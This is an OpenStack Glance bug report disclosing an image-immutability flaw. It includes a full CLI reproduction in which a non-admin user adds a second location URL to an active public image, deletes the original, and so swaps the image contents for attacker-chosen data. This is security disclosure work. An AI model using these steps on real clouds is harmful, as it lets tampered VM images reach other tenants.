Glance

  1. Bug #1549483
  2. Comment #0

Comment 0 for bug 1549483

Revision history for this message
Mike Fedosin (mfedosin) wrote :

Some time ago there was a security bug https://bugs.launchpad.net/glance/+bug/1525915 and a patch was proposed and merged in Glance repo. Unfortunately it partially fixed the problem and the issue with immutability still exists.

Bug description:
User (non admin) can change image data by updating location for image when "show_multiple_locations" config parameter has been set to true. This breaks the immutability of images in Glance and allows malicious user to replace data after image activation.

mfedosin@wdev:~$ glance image-create --name good --disk-format qcow2 --container-format bare --visibility public
+------------------+--------------------------------------+
| Property | Value |
 +------------------+--------------------------------------+
| checksum | None |
| container_format | bare |
| created_at | 2015-11-10T18:41:53Z |
| disk_format | qcow2 |
| id | 2a745d21-66b7-43e0-90b5-ebe62232f7d6 |
| locations | [] |
| min_disk | 0 |
| min_ram | 0 |
| name | good |
| owner | f3b42d4b90d840b8806e46fb4a7edca3 |
| protected | False |
| size | None |
| status | queued |
| tags | [] |
| updated_at | 2015-11-10T18:41:53Z |
| virtual_size | None |
| visibility | public |
 +------------------+--------------------------------------+
mfedosin@wdev:~$ glance location-add 2a745d21-66b7-43e0-90b5-ebe62232f7d6 --url 'https://dl.dropboxusercontent.com/u/13626875/good.txt'
+------------------+----------------------------------------------------------------------------------+
| Property | Value |
 +------------------+----------------------------------------------------------------------------------+
| checksum | None |
| container_format | bare |
| created_at | 2015-11-10T18:41:53Z |
| disk_format | qcow2 |
| file | /v2/images/2a745d21-66b7-43e0-90b5-ebe62232f7d6/file |
| id | 2a745d21-66b7-43e0-90b5-ebe62232f7d6 |
| locations | [{"url": "https://dl.dropboxusercontent.com/u/13626875/good.txt", "metadata": |
| | {}}] |
| min_disk | 0 |
| min_ram | 0 |
| name | good |
| owner | f3b42d4b90d840b8806e46fb4a7edca3 |
| protected | False |
| schema | /v2/schemas/image |
| size | 43 |
| status | active |
| tags | [] |
| updated_at | 2015-11-10T18:42:21Z |
| virtual_size | None |
| visibility | public |
 +------------------+----------------------------------------------------------------------------------+
mfedosin@wdev:~$ glance image-download 2a745d21-66b7-43e0-90b5-ebe62232f7d6 --file ooo
mfedosin@wdev:~$ cat ooo
I'm really good image.
mfedosin@wdev:~$ glance location-add 2a745d21-66b7-43e0-90b5-ebe62232f7d6 --url 'https://dl.dropboxusercontent.com/u/13626875/bad.txt'
+------------------+----------------------------------------------------------------------------------+
| Property | Value |
 +------------------+----------------------------------------------------------------------------------+
| checksum | None |
| container_format | bare |
| created_at | 2015-11-10T18:41:53Z |
| disk_format | qcow2 |
| file | /v2/images/2a745d21-66b7-43e0-90b5-ebe62232f7d6/file |
| id | 2a745d21-66b7-43e0-90b5-ebe62232f7d6 |
| locations | [{"url": "https://dl.dropboxusercontent.com/u/13626875/good.txt", "metadata": |
| | {}}, {"url": "https://dl.dropboxusercontent.com/u/13626875/bad.txt", "metadata": |
| | {}}] |
| min_disk | 0 |
| min_ram | 0 |
| name | good |
| owner | f3b42d4b90d840b8806e46fb4a7edca3 |
| protected | False |
| schema | /v2/schemas/image |
| size | 43 |
| status | active |
| tags | [] |
| updated_at | 2015-11-10T18:42:29Z |
| virtual_size | None |
| visibility | public |
 +------------------+----------------------------------------------------------------------------------+
mfedosin@wdev:~$ glance location-delete 2a745d21-66b7-43e0-90b5-ebe62232f7d6 --url 'https://dl.dropboxusercontent.com/u/13626875/good.txt'
mfedosin@wdev:~$ glance image-download 2a745d21-66b7-43e0-90b5-ebe62232f7d6 --file ooo
mfedosin@wdev:~$ cat ooo
All your base are belong to us! Muahahaha!